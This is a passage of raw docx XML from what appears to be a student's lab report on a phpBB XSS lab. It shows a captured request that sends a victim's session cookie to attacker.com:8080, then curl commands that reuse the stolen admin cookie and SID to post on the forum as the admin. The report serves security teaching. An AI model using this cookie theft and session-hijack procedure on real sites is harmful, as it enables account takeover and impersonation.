        <w:t>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D;%20phpbb2mysql_sid=</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>e1eeb5678b610a6ea13725a010842a6e</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>;%20phpbb2mysql_t=a%3A4%3A%7Bi%3A10%3Bi%3A1632235863%3Bi%3A9%3Bi%3A1632235896%3Bi%3A11%3Bi%3A1632232865%3Bi%3A12%3Bi%3A1632235667%3B%7D</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37494529" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>Host: attacker.com:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF07A5" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04FEF0" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>Accept: image/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>webp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>,*/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B5074C" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>=0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5945F" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79EF55" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF32FD" w14:textId="7CDF5C27" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>: http://www.xsslabphpbb.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60517374" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F"/>
    <w:p w14:paraId="4B6041F1" w14:textId="177E6DB6" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="00151434">
        <w:t xml:space="preserve">Attacker writes the message he would like to comment for the admin. </w:t>
      </w:r>
      <w:r>
        <w:t>Attacker looks at post request from own login. The submit button expires too quick, difficult to copy the curl command. Therefore we will copy the post from preview instead and modify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D57E7EE" w14:textId="77777777" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7A9621" wp14:editId="5A6462CE">
            <wp:extent cx="6645910" cy="4385945"/>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4385945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDD19D" w14:textId="77777777" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F"/>
    <w:p w14:paraId="2A0B664F" w14:textId="77777777" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="228758D8" wp14:editId="6D6C3463">
            <wp:extent cx="6645910" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 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4381500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C59977" w14:textId="77777777" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F"/>
    <w:p w14:paraId="0386E78F" w14:textId="178AADF8" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:r>
        <w:t>This is the curl command received from clicking preview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E40B84B" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F"/>
    <w:p w14:paraId="1303F1A9" w14:textId="77777777" w:rsidR="00D3764F" w:rsidRPr="00476620" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 'http://www.xsslabphpbb.com/posting.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>=0.5' --compressed -H 'Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>' -H 'Origin: http://www.xsslabphpbb.com' -H 'Connection: keep-alive' -H '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve">: http://www.xsslabphpbb.com/posting.php?mode=newtopic&amp;f=1' -H 'Cookie: </w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>phpbb2mysql_t=a%3A9%3A%7Bi%3A3%3Bi%3A1632144863%3Bi%3A4%3Bi%3A1632144965%3Bi%3A5%3Bi%3A1632146446%3Bi%3A6%3Bi%3A1632154544%3Bi%3A7%3Bi%3A1632153361%3Bi%3A8%3Bi%3A1632155755%3Bi%3A9%3Bi%3A1632234295%3Bi%3A10%3Bi%3A1632233543%3Bi%3A12%3Bi%3A1632234184%3B%7D; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D; phpbb2mysql_sid=8bb5130f23ab2558acbb2a4256dc482e'</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H 'Upgrade-Insecure-Requests: 1' --data-raw 'subject=Task+4&amp;addbbcode18=%23444444&amp;addbbcode20=0&amp;helpbox=Underline+text%3A+%5Bu%5Dtext%5B%2Fu%5D++%28alt%2Bu%29&amp;message=Posting+for+Admin%0D%0ASincerely%2C%0D%0AAttacker&amp;poll_title=&amp;add_poll_option_text=&amp;poll_length=&amp;mode=newtopic&amp;sid=</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>8bb5130f23ab2558acbb2a4256dc482e</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>&amp;f=1&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>preview=Preview'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44605D" w14:textId="77777777" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F"/>
    <w:p w14:paraId="7CE450BE" w14:textId="2F71BB21" w:rsidR="00D3764F" w:rsidRDefault="00151434">
      <w:r>
        <w:t xml:space="preserve">The parts highlighted in </w:t>
      </w:r>
      <w:r w:rsidRPr="00151434">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>green</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are what we will modify to impersonate the admin/victim. </w:t>
      </w:r>
      <w:r w:rsidR="00D3764F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F3296" w14:textId="137D4521" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3: We need to modify the curl command above in order to impersonate the victim/admin. The parts that need to be modified at highlighted in </w:t>
      </w:r>
      <w:r w:rsidR="00151434" w:rsidRPr="00151434">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>green</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13076650" w14:textId="10A2547B" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F"/>
    <w:p w14:paraId="3E8FBA9D" w14:textId="112B7461" w:rsidR="00151434" w:rsidRDefault="00151434" w:rsidP="00D3764F">
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1: Finding what to put instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>preview=Preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. We can look at the page source of the message </w:t>
      </w:r>
      <w:r w:rsidR="00476620">
        <w:t>positing website</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45926D86" w14:textId="6D9B1181" w:rsidR="00151434" w:rsidRDefault="00151434" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FB63F1" wp14:editId="7AA1BD47">
            <wp:extent cx="6645910" cy="4326890"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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4326890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D891D59" w14:textId="77777777" w:rsidR="00476620" w:rsidRDefault="00476620" w:rsidP="00D3764F"/>
    <w:p w14:paraId="60F83437" w14:textId="58B1F176" w:rsidR="00151434" w:rsidRDefault="00476620" w:rsidP="00D3764F">
      <w:r>
        <w:t xml:space="preserve">From the page source we see two input type = “submit”. The first one has the name “preview” and value “Preview”. The latter one has the name “post” and value “Submit”. Therefore we can replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>preview=Preview</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
        </w:rPr>
        <w:t>post=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7AC0DF" w14:textId="00A94556" w:rsidR="00476620" w:rsidRDefault="00476620" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D5B0B5" wp14:editId="0789869D">
            <wp:extent cx="6645910" cy="4870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487045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC82EA" w14:textId="40740B96" w:rsidR="00476620" w:rsidRDefault="00476620" w:rsidP="00D3764F"/>
    <w:p w14:paraId="7BDAF49F" w14:textId="77777777" w:rsidR="00476620" w:rsidRDefault="00476620">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED6204" w14:textId="79E25B71" w:rsidR="00476620" w:rsidRPr="00476620" w:rsidRDefault="00476620" w:rsidP="00D3764F">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2: Changing the cookie and SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422AB9ED" w14:textId="746BF33F" w:rsidR="00D3764F" w:rsidRDefault="00151434" w:rsidP="00D3764F">
      <w:r>
        <w:t>The data highlighted in blue is the cookie we sniffed from the admin/victim when they clicked on our post in Task 3.</w:t>
      </w:r>
      <w:r w:rsidR="00476620">
        <w:t xml:space="preserve"> The SID is given in the cookie as well. So we just need to copy the value in the subject field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F06955" w14:textId="19E77605" w:rsidR="00D3764F" w:rsidRDefault="00D3764F" w:rsidP="00D3764F"/>
    <w:p w14:paraId="5FA753D7" w14:textId="7782853B" w:rsidR="00476620" w:rsidRDefault="00476620" w:rsidP="00D3764F">
      <w:r>
        <w:t>Putting it together, this is the final command used by attacker to post for the admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F327649" w14:textId="77777777" w:rsidR="00476620" w:rsidRDefault="00476620" w:rsidP="00D3764F"/>
    <w:p w14:paraId="20089247" w14:textId="72F5DB8C" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00D3764F" w:rsidP="00D3764F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 'http://www.xsslabphpbb.com/posting.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>=0.5' --compressed -H 'Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>' -H 'Origin: http://www.xsslabphpbb.com' -H 'Connection: keep-alive' -H '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">: http://www.xsslabphpbb.com/posting.php?mode=newtopic&amp;f=1' -H 'Cookie: </w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>e1eeb5678b610a6ea13725a010842a6e</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>; phpbb2mysql_t=a%3A4%3A%7Bi%3A10%3Bi%3A1632235907%3Bi%3A9%3Bi%3A1632235896%3Bi%3A11%3Bi%3A1632232865%3Bi%3A12%3Bi%3A1632235667%3B%7D'</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H 'Upgrade-Insecure-Requests: 1' --data-raw 'subject=Task+4&amp;addbbcode18=%23444444&amp;addbbcode20=0&amp;helpbox=Font+color%3A+%5Bcolor%3Dred%5Dtext%5B%2Fcolor%5D++Tip%3A+you+can+also+use+color%3D%23FF0000&amp;message=Posting+for+admin%0D%0A-Sincerely%2C%0D%0Aattacker&amp;topictype=0&amp;poll_title=&amp;add_poll_option_text=&amp;poll_length=&amp;mode=newtopic&amp;sid=</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>e1eeb5678b610a6ea13725a010842a6e</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>&amp;f=1&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>post=Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Consolas"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF47621" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F"/>
    <w:p w14:paraId="566A12EA" w14:textId="50FF34D6" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699ACE74" wp14:editId="3AB5FE9F">
            <wp:extent cx="6645910" cy="4359275"/>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4359275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B9C65" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F081DA1" w14:textId="3B99E3C9" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Result: Attacker successfully posted for admin. Here you can see “Your message has been entered successfully” from the attacker VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51374C32" w14:textId="12341BCD" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2429ADD4" wp14:editId="5817FB51">
            <wp:extent cx="6645910" cy="4311650"/>
            <wp:effectExtent l="0" t="0" r="0"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4311650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DB660A" w14:textId="19C45FD4" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F"/>
    <w:p w14:paraId="1D9CF846" w14:textId="21BD3A59" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:t xml:space="preserve">Looking at proof on Test Forum 1. There is a new post. The author field shows that it is posted by admin. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8081A9" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F3ED6D2" wp14:editId="25323551">
            <wp:extent cx="6645910" cy="4325620"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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4325620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
